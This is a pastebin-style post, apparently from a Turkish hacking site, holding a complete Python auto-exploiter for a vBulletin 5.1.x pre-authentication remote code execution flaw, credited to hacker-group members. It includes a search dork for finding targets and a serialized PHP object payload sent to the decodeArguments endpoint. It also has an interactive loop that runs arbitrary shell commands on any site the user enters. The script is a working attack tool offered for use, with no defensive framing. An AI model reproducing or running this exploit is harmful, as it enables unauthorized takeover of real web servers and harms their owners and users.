Uyarı!

Sistemimizden daha iyi faydalanabilmek için Üye Olmanız yada Giriş Yapmanız gerekmektedir. yada Şifremi Unuttum tıkla

Pastebin | Pastebin Ekle

vbulettin 5.1

redkit tarafından ... 31.05.2016 - 18:23
|
			#Exploit Title: vBulletin 5.1.x - PreAuth Remote Code Execution
#Date: 11-10-2015
#Dork:Powered by: vBulletin, Version 5.1 or make your own ^^
#Requirements: Python 3.4.x or higher, install Requests and parse Module.
#Description: Not the authors of this exploit we just fixed the exploit and coded this script (Mauritania Attacker & Th3Falcon)
 
import  requests, re, sys
import  parse as   urlparse  #BUG Python Module Parse Fixed By Mauritania Attacker (urllib.parse does not work properly)
 
def banner():
    print( '\n' )
    print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
    print( '               VBulletin 5.1.x RCE auto Exploiter Priv8             ' )
    print( '                 GreetZ To All Members                    ' )
    print( '                 Coded by Mauritania Attacker & Th3Falcon           ' )
    print( '++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++' )
    print( '\n' )
 
def inject( ghost ):
    url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
    try:
        r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:14:"echo Th3Falcon";}', timeout= 50 )
        if 'Th3Falcon' in r.text and len( r.text ) < 50:
            try:
                r   = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:49:"whoami;echo :::;id;echo :::;uname -a;echo :::;pwd";}', timeout= 50 )
                print( '     [+] GROUP   :  ' + r.text.split( ':::' )[0].strip() )
                print( '     [+] USER    :  ' + r.text.split( ':::' )[1].strip() )
                print( '     [+] KERNEL  :  ' + r.text.split( ':::' )[2].strip() )
                print( '     [+] DIR     :  ' + r.text.split( ':::' )[3].strip() )
                sys.stdout.flush()
                return r.text.split( ':::' )[3].strip();
            except:
                return ''
        else:
            return ''
    except:
        print('     [+] Problem while exploiting..')
        return ''
 
def bash(ghost, command):
    url = ghost + '/ajax/api/hook/decodeArguments?' #Added "?" after each decodeArguments variable By Mauritania Attacker
    r = requests.get( url, params = 'arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:' + str(len(command)) + ':"' + command + '";}', timeout= 50 )
    print(r.text)
 
def main():
    banner()
    site = ''
    while site != 'exit':
        site = input('Target : ')
        if site == 'exit':
            break
        mad = inject(site)
        if mad != '' :
           
            print('     [+] @Connection Successfully established... \n')
            userinput = ''
            while userinput != 'exit':
                userinput = input("[email protected] :")
                if userinput == 'exit':
                    break
                bash(site, userinput)
        else:
            print('     [+] Website is not Vulnerable :(')
 
if __name__ == '__main__':
    main()
 
#D0ne
#./Mauritania Attacker
#./Th3Falcon
#GreetZ To All AnonGhost MemberZ